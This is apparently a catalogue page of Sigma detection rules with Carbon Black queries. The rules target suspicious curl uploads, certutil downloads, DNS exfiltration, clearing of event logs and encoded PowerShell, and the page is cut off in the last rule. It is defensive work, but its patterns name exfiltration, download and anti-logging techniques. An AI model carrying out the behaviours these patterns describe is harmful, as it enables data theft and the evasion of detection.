VMware Carbon Black detection rules

medium Moderate Medium FP

Suspicious Curl Change User Agents - Linux

Detects a suspicious curl process start on linux with set useragent options

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id b86d356d-6093-443d-971c-9b07db583c68

carbon_black query

Image:\/curl (CommandLine:\ \-A\ * OR CommandLine:\ \-\-user\-agent\ *)

view Sigma YAML

title: Suspicious Curl Change User Agents - Linux
id: b86d356d-6093-443d-971c-9b07db583c68
related:
    - id: 3286d37a-00fd-41c2-a624-a672dcd34e60
      type: derived
status: test
description: Detects a suspicious curl process start on linux with set useragent options
references:
    - https://curl.se/docs/manpage.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-15
tags:
    - attack.command-and-control
    - attack.t1071.001
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/curl'
        CommandLine|contains:
            - ' -A '
            - ' --user-agent '
    condition: selection
falsepositives:
    - Scripts created by developers and admins
    - Administrative activity
level: medium

Convert to SIEM query

medium Strong Medium FP

Suspicious Curl File Upload - Linux

Detects a suspicious curl process start the adds a file to a web request

status test author Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update) ATT&CK technique id 00b90cc1-17ec-402c-96ad-3a8117d7a582

carbon_black query

(Image:\/curl ((CommandLine:\ \-\-form* OR CommandLine:\ \-\-upload\-file\ * OR CommandLine:\ \-\-data\ * OR CommandLine:\ \-\-data\-*) OR CommandLine:\\s-[FTd]\\s)) (-(CommandLine:\:\/\/localhost* OR CommandLine:\:\/\/127.0.0.1*))

view Sigma YAML

title: Suspicious Curl File Upload - Linux
id: 00b90cc1-17ec-402c-96ad-3a8117d7a582
related:
    - id: 00bca14a-df4e-4649-9054-3f2aa676bc04
      type: derived
status: test
description: Detects a suspicious curl process start the adds a file to a web request
references:
    - https://twitter.com/d1r4c/status/1279042657508081664
    - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file
    - https://curl.se/docs/manpage.html
    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)
date: 2022-09-15
modified: 2023-05-02
tags:
    - attack.exfiltration
    - attack.command-and-control
    - attack.t1567
    - attack.t1105
logsource:
    category: process_creation
    product: linux
detection:
    selection_img:
        Image|endswith: '/curl'
    selection_cli:
        - CommandLine|contains:
              - ' --form' # Also covers the "--form-string"
              - ' --upload-file '
              - ' --data '
              - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode"
        - CommandLine|re: '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection
    filter_optional_localhost:
        CommandLine|contains:
            - '://localhost'
            - '://127.0.0.1'
    condition: all of selection_* and not 1 of filter_optional_*
falsepositives:
    - Scripts created by developers and admins
level: medium

Convert to SIEM query

medium Strong Medium FP

Suspicious DNS Query for IP Lookup Service APIs

Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non browser process.

status test author Brandon George (blog post), Thomas Patzke ATT&CK technique id ec82e2a5-81ea-4211-a1f8-37a0286df2c2

carbon_black query

((QueryName:www.ip.cn OR QueryName:l2.io) OR (QueryName:api.2ip.ua* OR QueryName:api.bigdatacloud.net* OR QueryName:api.ipify.org* OR QueryName:bot.whatismyipaddress.com* OR QueryName:canireachthe.net* OR QueryName:checkip.amazonaws.com* OR QueryName:checkip.dyndns.org* OR QueryName:curlmyip.com* OR QueryName:db\-ip.com* OR QueryName:edns.ip\-api.com* OR QueryName:eth0.me* OR QueryName:freegeoip.app* OR QueryName:geoipy.com* OR QueryName:getip.pro* OR QueryName:icanhazip.com* OR QueryName:ident.me* OR QueryName:ifconfig.io* OR QueryName:ifconfig.me* OR QueryName:ip\-api.com* OR QueryName:ip.360.cn* OR QueryName:ip.anysrc.net* OR QueryName:ip.taobao.com* OR QueryName:ip.tyk.nu* OR QueryName:ipaddressworld.com* OR QueryName:ipapi.co* OR QueryName:ipconfig.io* OR QueryName:ipecho.net* OR QueryName:ipinfo.io* OR QueryName:ipip.net* OR QueryName:ipof.in* OR QueryName:ipv4.icanhazip.com* OR QueryName:ipv4bot.whatismyipaddress.com* OR QueryName:ipv6\-test.com* OR QueryName:ipwho.is* OR QueryName:jsonip.com* OR QueryName:myexternalip.com* OR QueryName:seeip.org* OR QueryName:wgetip.com* OR QueryName:whatismyip.akamai.com* OR QueryName:whois.pconline.com.cn* OR QueryName:wtfismyip.com*)) (-(Image:\\brave.exe OR (Image:C\:\\Program\ Files\\Google\\Chrome\\Application\\chrome.exe OR Image:C\:\\Program\ Files\ \(x86\)\\Google\\Chrome\\Application\\chrome.exe) OR (Image:C\:\\Program\ Files\\Mozilla\ Firefox\\firefox.exe OR Image:C\:\\Program\ Files\ \(x86\)\\Mozilla\ Firefox\\firefox.exe) OR (Image:C\:\\Program\ Files\ \(x86\)\\Internet\ Explorer\\iexplore.exe OR Image:C\:\\Program\ Files\\Internet\ Explorer\\iexplore.exe) OR Image:\\maxthon.exe OR (Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\EdgeWebView\\Application\\* OR Image:\\WindowsApps\\MicrosoftEdge.exe OR (Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\Edge\\Application\\msedge.exe OR Image:C\:\\Program\ Files\\Microsoft\\Edge\\Application\\msedge.exe)) OR ((Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\EdgeCore\\* OR Image:C\:\\Program\ Files\\Microsoft\\EdgeCore\\*) (Image:\\msedge.exe OR Image:\\msedgewebview2.exe)) OR Image:\\opera.exe OR Image:\\safari.exe OR Image:\\seamonkey.exe OR Image:\\vivaldi.exe OR Image:\\whale.exe))

view Sigma YAML

title: Suspicious DNS Query for IP Lookup Service APIs
id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2
status: test
description: Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non browser process.
references:
    - https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon
    - https://twitter.com/neonprimetime/status/1436376497980428318
    - https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html
author: Brandon George (blog post), Thomas Patzke
date: 2021-07-08
modified: 2024-03-22
tags:
    - attack.reconnaissance
    - attack.t1590
logsource:
    product: windows
    category: dns_query
detection:
    selection:
        - QueryName:
              - 'www.ip.cn'
              - 'l2.io'
        - QueryName|contains:
              - 'api.2ip.ua'
              - 'api.bigdatacloud.net'
              - 'api.ipify.org'
              - 'bot.whatismyipaddress.com'
              - 'canireachthe.net'
              - 'checkip.amazonaws.com'
              - 'checkip.dyndns.org'
              - 'curlmyip.com'
              - 'db-ip.com'
              - 'edns.ip-api.com'
              - 'eth0.me'
              - 'freegeoip.app'
              - 'geoipy.com'
              - 'getip.pro'
              - 'icanhazip.com'
              - 'ident.me'
              - 'ifconfig.io'
              - 'ifconfig.me'
              - 'ip-api.com'
              - 'ip.360.cn'
              - 'ip.anysrc.net'
              - 'ip.taobao.com'
              - 'ip.tyk.nu'
              - 'ipaddressworld.com'
              - 'ipapi.co'
              - 'ipconfig.io'
              - 'ipecho.net'
              - 'ipinfo.io'
              - 'ipip.net'
              - 'ipof.in'
              - 'ipv4.icanhazip.com'
              - 'ipv4bot.whatismyipaddress.com'
              - 'ipv6-test.com'
              - 'ipwho.is'
              - 'jsonip.com'
              - 'myexternalip.com'
              - 'seeip.org'
              - 'wgetip.com'
              - 'whatismyip.akamai.com'
              - 'whois.pconline.com.cn'
              - 'wtfismyip.com'
    filter_optional_brave:
        Image|endswith: '\brave.exe'
    filter_optional_chrome:
        Image:
            - 'C:\Program Files\Google\Chrome\Application\chrome.exe'
            - 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe'
    filter_optional_firefox:
        Image:
            - 'C:\Program Files\Mozilla Firefox\firefox.exe'
            - 'C:\Program Files (x86)\Mozilla Firefox\firefox.exe'
    filter_optional_ie:
        Image:
            - 'C:\Program Files (x86)\Internet Explorer\iexplore.exe'
            - 'C:\Program Files\Internet Explorer\iexplore.exe'
    filter_optional_maxthon:
        Image|endswith: '\maxthon.exe'
    filter_optional_edge_1:
        - Image|startswith: 'C:\Program Files (x86)\Microsoft\EdgeWebView\Application\'
        - Image|endswith: '\WindowsApps\MicrosoftEdge.exe'
        - Image:
              - 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'
              - 'C:\Program Files\Microsoft\Edge\Application\msedge.exe'
    filter_optional_edge_2:
        Image|startswith:
            - 'C:\Program Files (x86)\Microsoft\EdgeCore\'
            - 'C:\Program Files\Microsoft\EdgeCore\'
        Image|endswith:
            - '\msedge.exe'
            - '\msedgewebview2.exe'
    filter_optional_opera:
        Image|endswith: '\opera.exe'
    filter_optional_safari:
        Image|endswith: '\safari.exe'
    filter_optional_seamonkey:
        Image|endswith: '\seamonkey.exe'
    filter_optional_vivaldi:
        Image|endswith: '\vivaldi.exe'
    filter_optional_whale:
        Image|endswith: '\whale.exe'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Legitimate usage of IP lookup services such as ipify API
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious DNS Query with B64 Encoded String

Detects suspicious DNS queries using base64 encoding

status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id 4153a907-2451-4e4f-a578-c52bb6881432

carbon_black query

query:==.*

view Sigma YAML

title: Suspicious DNS Query with B64 Encoded String
id: 4153a907-2451-4e4f-a578-c52bb6881432
status: test
description: Detects suspicious DNS queries using base64 encoding
references:
    - https://github.com/krmaxwell/dns-exfiltration
author: Florian Roth (Nextron Systems)
date: 2018-05-10
modified: 2022-10-09
tags:
    - attack.exfiltration
    - attack.t1048.003
    - attack.command-and-control
    - attack.t1071.004
logsource:
    category: dns
detection:
    selection:
        query|contains: '==.'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Suspicious DNS Z Flag Bit Set

The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused). Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'

status test author @neu5ron, SOC Prime Team, Corelight ATT&CK technique id ede05abc-2c9e-4624-9944-9ff17fdc0bf5

carbon_black query

(-Z:0) query:.* (-((query:.arpa OR query:.local OR query:.ultradns.net OR query:.twtrdns.net OR query:.azuredns\-prd.info OR query:.azure\-dns.com OR query:.azuredns\-ff.info OR query:.azuredns\-ff.org OR query:.azuregov\-dns.org) OR (qtype_name:ns OR qtype_name:mx) OR answers:\\x00 OR ("id.resp_p":137 OR "id.resp_p":138 OR "id.resp_p":139)))

view Sigma YAML

title: Suspicious DNS Z Flag Bit Set
id: ede05abc-2c9e-4624-9944-9ff17fdc0bf5
status: test
description: |
    The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).
    Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.
    Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.
    Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.
    This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'
references:
    - https://twitter.com/neu5ron/status/1346245602502443009
    - https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma
    - https://tools.ietf.org/html/rfc2929#section-2.1
    - https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS
author: '@neu5ron, SOC Prime Team, Corelight'
date: 2021-05-04
modified: 2022-11-29
tags:
    - attack.t1095
    - attack.t1571
    - attack.command-and-control
logsource:
    product: zeek
    service: dns
detection:
    z_flag_unset:
        Z: 0
    most_probable_valid_domain:
        query|contains: '.'
    exclude_tlds:
        query|endswith:
            - '.arpa'
            - '.local'
            - '.ultradns.net'
            - '.twtrdns.net'
            - '.azuredns-prd.info'
            - '.azure-dns.com'
            - '.azuredns-ff.info'
            - '.azuredns-ff.org'
            - '.azuregov-dns.org'
    exclude_query_types:
        qtype_name:
            - 'ns'
            - 'mx'
    exclude_responses:
        answers|endswith: '\\x00'
    exclude_netbios:
        id.resp_p:
            - 137
            - 138
            - 139
    condition: not z_flag_unset and most_probable_valid_domain and not (exclude_tlds or exclude_query_types or exclude_responses or exclude_netbios)
falsepositives:
    - 'Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.'
    - 'If you work in a Public Sector then it may be good to exclude things like endswith ".edu", ".gov" and or ".mil"'
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious Diantz Alternate Data Stream Execution

Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.

status test author frack113 ATT&CK sub-technique id 6b369ced-4b1d-48f1-b427-fdc0de0790bd

carbon_black query

(CommandLine:diantz.exe* CommandLine:.cab*) CommandLine::[^\\\\]

view Sigma YAML

title: Suspicious Diantz Alternate Data Stream Execution
id: 6b369ced-4b1d-48f1-b427-fdc0de0790bd
status: test
description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Diantz/
author: frack113
date: 2021-11-26
modified: 2022-12-31
tags:
    - attack.stealth
    - attack.t1564.004
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - diantz.exe
            - .cab
        CommandLine|re: ':[^\\]'
    condition: selection
falsepositives:
    - Very Possible
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious Diantz Download and Compress Into a CAB File

Download and compress a remote file and store it in a cab file on local machine.

status test author frack113 ATT&CK technique id 185d7418-f250-42d0-b72e-0c8b70661e93

carbon_black query

CommandLine:diantz.exe* CommandLine:\ \\\\* CommandLine:.cab*

view Sigma YAML

title: Suspicious Diantz Download and Compress Into a CAB File
id: 185d7418-f250-42d0-b72e-0c8b70661e93
status: test
description: Download and compress a remote file and store it in a cab file on local machine.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Diantz/
author: frack113
date: 2021-11-26
modified: 2022-08-13
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - diantz.exe
            - ' \\\\'
            - '.cab'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Low FP

Suspicious Digital Signature Of AppX Package

Detects execution of AppX packages with known suspicious or malicious signature

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id b5aa7d60-c17e-4538-97de-09029d6cd76b

carbon_black query

EventID:157 subjectName:CN=Foresee\ Consulting\ Inc.,\ O=Foresee\ Consulting\ Inc.,\ L=North\ York,\ S=Ontario,\ C=CA,\ SERIALNUMBER=1004913\-1,\ OID.1.3.6.1.4.1.311.60.2.1.3=CA,\ OID.2.5.4.15=Private\ Organization

view Sigma YAML

title: Suspicious Digital Signature Of AppX Package
id: b5aa7d60-c17e-4538-97de-09029d6cd76b
status: test
description: Detects execution of AppX packages with known suspicious or malicious signature
references:
    - Internal Research
    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-16
tags:
    - attack.execution
    - attack.stealth
logsource:
    product: windows
    service: appxpackaging-om
detection:
    selection:
        EventID: 157
        # Add more known suspicious/malicious certificates used in different attacks
        subjectName: 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Suspicious Download Via Certutil.EXE

Detects the execution of certutil with certain flags that allow the utility to download files.

status test author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 19b08b1c-861d-4e75-a1ef-ea0c1baf202b

carbon_black query

(Image:\\certutil.exe OR OriginalFileName:CertUtil.exe) (CommandLine:urlcache\ * OR CommandLine:verifyctl\ * OR CommandLine:URL\ *) CommandLine:http*

view Sigma YAML

title: Suspicious Download Via Certutil.EXE
id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b
related:
    - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829
      type: similar
status: test
description: Detects the execution of certutil with certain flags that allow the utility to download files.
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
    - https://forensicitguy.github.io/agenttesla-vba-certutil-download/
    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/
    - https://twitter.com/egre55/status/1087685529016193025
    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
    - https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-15
modified: 2025-12-01
tags:
    - attack.stealth
    - attack.t1027
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\certutil.exe'
        - OriginalFileName: 'CertUtil.exe'
    selection_flags:
        CommandLine|contains:
            - 'urlcache '
            - 'verifyctl '
            - 'URL '
    selection_http:
        CommandLine|contains: 'http'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/info.yml

Convert to SIEM query

medium Moderate Medium FP

Suspicious Driver Install by pnputil.exe

Detects when a possible suspicious driver is being installed via pnputil.exe lolbin

status test author Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger ATT&CK technique id a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1

carbon_black query

(CommandLine:\-i* OR CommandLine:\/install* OR CommandLine:\-a* OR CommandLine:\/add\-driver* OR CommandLine:.inf*) Image:\\pnputil.exe

view Sigma YAML

title: Suspicious Driver Install by pnputil.exe
id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1
status: test
description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin
references:
    - https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax
    - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html
author: Hai Vaknin @LuxNoBulIshit, Avihay eldad  @aloneliassaf, Austin Songer @austinsonger
date: 2021-09-30
modified: 2022-10-09
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - '-i'
            - '/install'
            - '-a'
            - '/add-driver'
            - '.inf'
        Image|endswith: '\pnputil.exe'
    condition: selection
falsepositives:
    - Pnputil.exe being used may be performed by a system administrator.
    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
    - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium

Convert to SIEM query

medium Strong Medium FP

Suspicious Electron Application Child Processes

Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id f26eb764-fd89-464b-85e2-dc4a8e6e77b8

carbon_black query

(ParentImage:\\chrome.exe OR ParentImage:\\discord.exe OR ParentImage:\\GitHubDesktop.exe OR ParentImage:\\keybase.exe OR ParentImage:\\msedge.exe OR ParentImage:\\msedgewebview2.exe OR ParentImage:\\msteams.exe OR ParentImage:\\slack.exe OR ParentImage:\\teams.exe) ((Image:\\cmd.exe OR Image:\\cscript.exe OR Image:\\mshta.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\regsvr32.exe OR Image:\\whoami.exe OR Image:\\wscript.exe) OR (Image:\:\\ProgramData\\* OR Image:\:\\Temp\\* OR Image:\\AppData\\Local\\Temp\\* OR Image:\\Users\\Public\\* OR Image:\\Windows\\Temp\\*)) (-(ParentImage:\\Discord.exe Image:\\cmd.exe CommandLine:\\NVSMI\\nvidia\-smi.exe*))

view Sigma YAML

title: Suspicious Electron Application Child Processes
id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8
related:
    - id: 378a05d8-963c-46c9-bcce-13c7657eac99
      type: similar
status: test
description: |
    Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
references:
    - https://taggart-tech.com/quasar-electron/
    - https://github.com/mttaggart/quasar
    - https://positive.security/blog/ms-officecmd-rce
    - https://lolbas-project.github.io/lolbas/Binaries/Msedge/
    - https://lolbas-project.github.io/lolbas/Binaries/Teams/
    - https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/
    - https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-21
modified: 2024-07-12
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            # Add more electron based app to the list
            - '\chrome.exe' # Might require additional tuning
            - '\discord.exe'
            - '\GitHubDesktop.exe'
            - '\keybase.exe'
            - '\msedge.exe'
            - '\msedgewebview2.exe'
            - '\msteams.exe'
            - '\slack.exe'
            - '\teams.exe'
            # - '\code.exe' # Prone to a lot of FPs. Requires an additional baseline
    selection_child_image:
        Image|endswith:
            # Add more suspicious/unexpected paths
            - '\cmd.exe'
            - '\cscript.exe'
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\regsvr32.exe'
            - '\whoami.exe'
            - '\wscript.exe'
    selection_child_paths:
        Image|contains:
            # Add more suspicious/unexpected paths
            - ':\ProgramData\'
            - ':\Temp\'
            - '\AppData\Local\Temp\'
            - '\Users\Public\'
            - '\Windows\Temp\'
    filter_optional_discord:
        ParentImage|endswith: '\Discord.exe'
        Image|endswith: '\cmd.exe'
        CommandLine|contains: '\NVSMI\nvidia-smi.exe'
    condition: selection_parent and 1 of selection_child_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
# Increase the level once FP rate is reduced (see status)
level: medium

Convert to SIEM query

medium Moderate Low FP

Suspicious Email Delivered In Microsoft 365

Detects instances where an email, identified as malicious or suspicious by the Microsoft Defender for Office 365 (formerly ATP) engine, was delivered to a user's Inbox or Junk folder. It might indicate that a potential threat, such as a spearphishing attachment or links, has bypassed initial blocking mechanisms and reached an end-user, requiring further investigation and potential remediation.

status experimental author Marco Pedrinazzi (@pedrinazziM) (InTheCyber) ATT&CK sub-technique id 3569aefd-e535-4391-8c18-24bd01a21eaf

carbon_black query

(Workload:ThreatIntelligence Operation:TIMailData Directionality:Inbound) (-DeliveryAction:Blocked)

view Sigma YAML

title: Suspicious Email Delivered In Microsoft 365
id: 3569aefd-e535-4391-8c18-24bd01a21eaf
status: experimental
description: |
    Detects instances where an email, identified as malicious or suspicious by the Microsoft Defender for Office 365 (formerly ATP) engine, was delivered to a user's Inbox or Junk folder.
    It might indicate that a potential threat, such as a spearphishing attachment or links, has bypassed initial blocking mechanisms and reached an end-user, requiring further investigation and potential remediation.
references:
    - https://learn.microsoft.com/en-us/defender-office-365/threat-explorer-real-time-detections-about
    - https://research.splunk.com/cloud/605cc93a-70e4-4ee3-9a3d-1a62e8c9b6c2/
    - https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/blob/e7250648cb16d4a497ae8737943bf010ea96d2e6/Defender%20For%20Cloud%20Apps/MaliciousEmailDeliveredInMailbox.md
author: Marco Pedrinazzi (@pedrinazziM) (InTheCyber)
date: 2026-01-27
tags:
    - attack.initial-access
    - attack.t1566.001
    - attack.t1566.002
logsource:
    service: audit
    product: m365
detection:
    selection:
        Workload: 'ThreatIntelligence'
        Operation: 'TIMailData'
        Directionality: 'Inbound'
    filter_main_blocked:
        DeliveryAction: 'Blocked'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unlikely
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious Eventlog Clear

Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs

status test author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK sub-technique id 0f017df3-8f5a-414f-ad6b-24aff1128278

carbon_black query

(ScriptBlockText:Clear\-EventLog\ * OR ScriptBlockText:Remove\-EventLog\ * OR ScriptBlockText:Limit\-EventLog\ * OR ScriptBlockText:Clear\-WinEvent\ *) OR (ScriptBlockText:Eventing.Reader.EventLogSession* ScriptBlockText:ClearLog*) OR (ScriptBlockText:Diagnostics.EventLog* ScriptBlockText:Clear*)

view Sigma YAML

title: Suspicious Eventlog Clear
id: 0f017df3-8f5a-414f-ad6b-24aff1128278
related:
    - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5
      type: derived
status: test
description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs
references:
    - https://twitter.com/oroneequalsone/status/1568432028361830402
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md
    - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html
    - https://stackoverflow.com/questions/66011412/how-to-clear-a-event-log-in-powershell-7
    - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog?view=windowsdesktop-9.0&viewFallbackFrom=dotnet-plat-ext-5.0#System_Diagnostics_Eventing_Reader_EventLogSession_ClearLog_System_String_
    - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear
author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2022-09-12
modified: 2025-10-06
tags:
    - attack.defense-impairment
    - attack.t1685.005
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        - ScriptBlockText|contains:
              - 'Clear-EventLog '
              - 'Remove-EventLog '
              - 'Limit-EventLog '
              - 'Clear-WinEvent '
        - ScriptBlockText|contains|all:
              - 'Eventing.Reader.EventLogSession' # [System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($_.LogName)
              - 'ClearLog'
        - ScriptBlockText|contains|all:
              - 'Diagnostics.EventLog'
              - 'Clear'
    condition: selection
falsepositives:
    - Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious Execution of InstallUtil Without Log

Uses the .NET InstallUtil.exe application in order to execute image without log

status test author frack113 ATT&CK tactic-only id d042284c-a296-4988-9be5-f424fadcc28c

carbon_black query

Image:\\InstallUtil.exe Image:Microsoft.NET\\Framework* (CommandLine:\/logfile=\ * CommandLine:\/LogToConsole=false*)

view Sigma YAML

title: Suspicious Execution of InstallUtil Without Log
id: d042284c-a296-4988-9be5-f424fadcc28c
status: test
description: Uses the .NET InstallUtil.exe application in order to execute image without log
references:
    - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/
    - https://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool
author: frack113
date: 2022-01-23
modified: 2022-02-04
tags:
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\InstallUtil.exe'
        Image|contains: 'Microsoft.NET\Framework'
        CommandLine|contains|all:
            - '/logfile= '
            - '/LogToConsole=false'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Suspicious Execution of Powershell with Base64

Commandline to launch powershell with a base64 payload

status test author frack113 ATT&CK sub-technique id fb843269-508c-4b76-8b8d-88679db22ce7

carbon_black query

((Image:\\powershell.exe OR Image:\\pwsh.exe) (CommandLine:\ \-e\ * OR CommandLine:\ \-en\ * OR CommandLine:\ \-enc\ * OR CommandLine:\ \-enco* OR CommandLine:\ \-ec\ *)) (-(CommandLine:\ \-Encoding\ * OR (ParentImage:C\:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\* OR ParentImage:\\gc_worker.exe*)))

view Sigma YAML

title: Suspicious Execution of Powershell with Base64
id: fb843269-508c-4b76-8b8d-88679db22ce7
status: test
description: Commandline to launch powershell with a base64 payload
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets
    - https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/
    - https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/
author: frack113
date: 2022-01-02
modified: 2023-01-05
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - \powershell.exe
